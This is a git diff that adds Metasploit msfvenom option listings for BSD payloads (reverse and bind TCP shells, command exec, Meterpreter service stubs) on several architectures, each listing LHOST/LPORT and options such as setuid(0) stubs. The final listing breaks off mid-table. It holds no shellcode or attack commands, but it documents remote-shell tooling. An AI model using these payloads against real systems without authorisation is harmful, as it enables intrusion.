@@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/sparc/shell_reverse_tcp + Platform: BSD + Arch: sparc +Needs Admin: No + Total size: 128 + Rank: Normal + +Provided by: + vlad902 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt new file mode 100644 index 0000000..376380d --- /dev/null +++ b/msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt 
@@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/vax/shell_reverse_tcp + Platform: BSD + Arch: vax +Needs Admin: No + Total size: 100 + Rank: Normal + +Provided by: + wvu + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-exec.txt b/msfvenom/payload_options/bsd-x64-exec.txt new file mode 100644 index 0000000..5f5629e --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-exec.txt 
@@ -0,0 +1,33 @@ + + Name: BSD x64 Execute Command + Module: payload/bsd/x64/exec + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 23 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..4fe87e9 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt 
@@ -0,0 +1,38 @@ + + Name: BSD x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/bsd/x64/shell_bind_ipv6_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..663b523 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt 
@@ -0,0 +1,40 @@ + + Name: BSD x64 Shell Bind TCP + Module: payload/bsd/x64/shell_bind_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 136 + Rank: Normal + +Provided by: + nemo + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Bind an arbitrary command to an arbitrary port + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt b/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt new file mode 100644 index 0000000..9011ec3 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt 
@@ -0,0 +1,38 @@ + + Name: BSD x64 Command Shell, Bind TCP Inline + Module: payload/bsd/x64/shell_bind_tcp_small + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 88 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..c197d9e --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt 
@@ -0,0 +1,46 @@ + + Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/bsd/x64/shell_reverse_ipv6_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..e47ce02 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt 
@@ -0,0 +1,47 @@ + + Name: BSD x64 Shell Reverse TCP + Module: payload/bsd/x64/shell_reverse_tcp + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 98 + Rank: Normal + +Provided by: + nemo + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt new file mode 100644 index 0000000..7d52f88 --- /dev/null +++ b/msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt 
@@ -0,0 +1,45 @@ + + Name: BSD x64 Command Shell, Reverse TCP Inline + Module: payload/bsd/x64/shell_reverse_tcp_small + Platform: BSD + Arch: x64 +Needs Admin: No + Total size: 81 + Rank: Normal + +Provided by: + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-exec.txt b/msfvenom/payload_options/bsd-x86-exec.txt new file mode 100644 index 0000000..9db1361 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-exec.txt 
@@ -0,0 +1,35 @@ + + Name: BSD Execute Command + Module: payload/bsd/x86/exec + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 16 + Rank: Normal + +Provided by: + snagg + argp + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..676541d --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt 
@@ -0,0 +1,49 @@ + + Name: FreeBSD Meterpreter Service, Bind TCP + Module: payload/bsd/x86/metsvc_bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) 
system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..b336f64 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt 
@@ -0,0 +1,56 @@ + + Name: FreeBSD Meterpreter Service, Reverse TCP Inline + Module: payload/bsd/x86/metsvc_reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a 
stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..f7b6998 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt 
@@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Bind TCP Stager (IPv6) + Module: payload/bsd/x86/shell/bind_ipv6_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 63 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..29aed98 
--- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt @@ -0,0 +1,43 @@ + + Name: BSD Command Shell, Bind TCP Stager + Module: payload/bsd/x86/shell/bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 54 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/bsd-x86-shell-find_tag.txt b/msfvenom/payload_options/bsd-x86-shell-find_tag.txt new file mode 100644 index 0000000..870547b --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-find_tag.txt @@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Find Tag Stager + Module: payload/bsd/x86/shell/find_tag + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 40 + Rank: Normal + +Provided by: + skape + +Description: + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG qFGA yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..3090e43 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt 
@@ -0,0 +1,53 @@ + + Name: BSD Command Shell, Reverse TCP Stager (IPv6) + Module: payload/bsd/x86/shell/reverse_ipv6_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 81 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Spawn a command shell (staged). + + Connect back to the attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..7490412 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt 
@@ -0,0 +1,50 @@ + + Name: BSD Command Shell, Reverse TCP Stager + Module: payload/bsd/x86/shell/reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 43 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
